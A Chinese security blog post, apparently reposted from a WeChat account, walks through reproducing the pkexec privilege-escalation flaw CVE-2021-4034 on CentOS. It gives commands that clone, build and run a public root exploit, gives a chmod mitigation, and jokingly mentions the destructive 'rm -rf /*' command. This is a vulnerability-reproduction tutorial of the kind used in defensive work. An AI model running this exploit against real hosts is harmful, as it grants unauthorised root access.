CVE-2021-4034漏洞提权

admin 2022年11月15日10:14:05安全漏洞评论26 views614字阅读2分2秒阅读模式

那日,我遥望着星空发呆。幻想着自己中五百万彩票后的事宜。突然一阵急促的消息打破了这本属于我的宁静。原理是阿里云的漏洞提醒!说我有台服务器存在CVE-2021-4034高危漏洞。这一切太突然了!

关于pkexec

pkexec是一个用于在Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。

漏洞危害

成功利用此漏洞允许任何非root用户在易受攻击的主机上获得root特权。并在默认安装的UbuntuDebianFedoraCentOS上获得完整的root权限。这个漏洞已经隐藏了12年多,并影响到目前为止所有版本的pkexec。(≤0.120

漏洞复现

我们为了方便测试,现在Centos中创建一个普通账号。

adduser kali
passwd kali
su kali

查看当前的版本

pkexec --version

CVE-2021-4034漏洞提权复现

git clone https://gitcode.net/mirrors/berdav/CVE-2021-4034.git
make
./
cve-2021-4034

效果

CVE-2021-4034漏洞提权

修复

取消pkexec程序特权

chmod 0755 /usr/bin/pkexec
CVE-2021-4034漏洞提权

总结

身为一名懂得rm -rf/*命令的资深Linux运维者。要时常关注漏洞信息,及时做好应急措施。当然学会如何跑路也是很重要的。

CVE-2021-4034漏洞提权

更多精彩文章 欢迎关注我们


原文始发于微信公众号(kali黑客笔记):CVE-2021-4034漏洞提权

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月15日10:14:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2021-4034漏洞提权 http://cn-sec.com/archives/1410148.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: